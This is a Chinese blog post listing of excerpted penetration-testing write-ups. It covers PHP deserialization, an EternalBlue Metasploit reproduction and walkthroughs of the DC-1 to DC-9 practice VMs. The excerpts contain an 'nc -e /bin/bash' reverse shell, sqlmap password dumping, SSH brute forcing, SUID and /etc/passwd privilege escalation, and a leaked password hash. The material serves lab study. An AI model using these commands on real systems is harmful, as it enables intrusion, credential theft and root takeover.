- 博客(11)
- 收藏
- 关注
RSS订阅原创 关于 PHP(反)序列化 的知识
如果存在__wakeup方法,调用unserilize()方法之前先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于真实属性个数时,会跳过__wakeup的执行。利用了__destruct()的特性,当实例化对象结束后,进行unserialize结束时,就会销毁代码,触发__destruct()在反序列化中,能控制的数据就是对象中的属性值(成员变量),所以在PHP反序列化中有一种漏洞利用方法叫“面向属性编程”,即POP。POC是一段不完整的程序,仅仅是为了证明提出者的一段代码。
2025-03-04 10:56:24
1155
1
原创 永恒之蓝漏洞复现(ms17-010)
1.扫描一下开启端口2.漏洞扫描发现ms17-010永恒之蓝漏洞3.漏洞利用进入MSF控制台msfconsole寻找我们刚才扫描到的0代表着永恒之蓝攻击模块,用于攻击目标用户加载扫描模块use 0运行成功会出现meterpreter控制台,并在结尾处出现 WIN 这时候我们就已经拿到权限并且可以使用。
2024-12-12 17:19:10
921
原创 DC-9靶机渗透测试
通俗来说端口探测可以理解为,我按顺序敲击端口就可以将ssh服务打开,反之敲击关闭,端口顺序存放在/etc/knockd.conf文件中。sqlmap -r '/root/桌面/1.txt' -D users -T UserDetails -C password --dump。构造/etc/passwd文件当中的信息,进行追加用户信息即可提权,仿照/etc/passwd文件当中内容进行构造信息。我们可以生成一串类似于/etc/passwd的信息,通过test.py脚本强加入/etc/passwd文件中,
2024-12-12 17:10:33
468
原创 DC-8靶机渗透测试
输入:cp /usr/share/exploitdb/exploits/linux/local/46996.sh 46996.sh。路径:/usr/share/exploitdb/exploits/linux/local/46996.sh。503 : 该状态码表明服务器暂时处于超负载或正在进行停机维护,现在无法处理请求。输入:searchsploit -p linux/local/46996.sh。(存在时间很短,手慢无)输入:find / -perm -4000 2>/dev/null。
2024-12-12 17:06:43
299
原创 DC-7靶机渗透测试
在dc7user目录中发现backups.sh脚本,此脚本是root用户运行,给我的思路是写入此脚本反弹shell,并进行监听就可以得到root权限。同样,因为这个cms支持添加插件,看大佬的wp,要下载一个支持php的插件,然后写入shell。在搜索栏搜索一下php这个插件是否开启,勾选并点击install,否则写的php代码不会被解析。发现此用户只有读和执行权限,没有把写入的权限,想办法进入www-data用户下进行写入。点击下载tar.gz,下载完毕后,点击后台界面的extend。
2024-12-12 17:05:54
392
原创 DC-6靶机渗透测试
sudo -u jens /home/jens/backups.sh【获得jens的shell权限】使用反弹shell nc -e /bin/bash 192.168.1.128 4444。根据DC-6靶机官网的提示线索,我们可以得到一个密码字典。再次suso -l查看是否有可以执行的命令。//线索给予的代码,可以得到一个密码字典。sudo-l 查看是否有可以执行的命令。发现命令执行漏洞【使用bp进行发包】发现一个jens可免密执行的文件。发现有一个nmap可以执行。开启了80端口和22端口。
2024-12-12 17:05:00
287
原创 DC-5靶机渗透测试
提交后这里就跳转到了/thankyou.php 页面,并且后面 get 提交刚刚输入的数据,根据种种迹象表名/thankyou.php 文件里应该包含了/footer.php 文件,使页面的版权声明随机变化,猜测这里可能存在文件包含漏洞,那就尝试一下文件包含。然后 kali 利用 python 开启一个 http 服务,将libhax.so、rootshell、dc5.sh,拷贝至靶机的/tmp 目录下。得知文件包含漏洞,我们可以在ssh日志,中间件日志以及临时文件中写入一句话木马然后进行包含,即可解析。
2024-12-12 17:03:35
1484
2
原创 DC-4靶机渗透测试
那么我可以直接写一个 root 权限的用户到 /etc/passwd 下,也可以直接在 sudoers 里给 charles 所有权限。发现一份 charles 给 jim 的信,他要去度假,老板让他把密码给 jim,ok 收获 charles 密码。第一种:medusa -M ssh -h 192.168.1.148 -u jim -P old-pass.txt。将获得的编码进行上传,同时在kali中进行监听 nc -lvp 4444【先开启监听再进行上传】使用bp进行抓包,爆破用户名密码。
2024-12-12 17:00:10
302
原创 DC-3靶机渗透测试
用户名:admin 密码:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu。然后在桌面打开终端然后开启http服务,将下载好的文件导入到DC-3靶机里。在此文件中给出关键信息,只要获得root权限,就可以得到flag。从非交互式shell变为交互式shell,这里使用python。于是回到网页上传页面,创建了一个反弹shell的php文件。下载该压缩包并放到kali桌面里,解压该文件。访问反弹shell的网页,使php命令执行。
2024-12-12 16:58:41
1731
原创 DC-2靶机渗透测试
WPScan是一款专门针对Wordpress网站的漏洞扫描工具,它还可以实现获取站点用户名。提到了git,在flag4.txt中也提到了git,所以利用git提权(存在缓冲区溢出漏洞)flag1中提到了cewl,检索发现是一个字典生成工具,但是现在还不知道用户名。ls后发现其中含有flag3.txt,但是不可以使用cat查看。现在有了密码,还差账号,这时候需要用到另一个工具。查看到flag3.txt的内容中提到了su的命令。使用jerry用户登陆后,发现flag2。开启ssh的7744端口,后面会用到。
2024-12-12 16:56:51
317
原创 DC-1靶机渗透测试
查看flag1文件,发现有提示,咱们寻找配置文件。Drupal的配置文件是网站根目录下的/site/defaultx下的setting.php文件,所以接下来进入sites目录下,接着进入default目录,查看settings.php文件。找查什么文件不重要(但是是存在的文件),只需要格式对,然后后面加上 -exec "/bin/sh" \;发现有22端口和80端口和111端口开启,并且80端口中的框架信息为Drupal 7。根据提示查看etc/passwd文件,发现有flag4用户。
2024-12-12 16:55:10
821
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人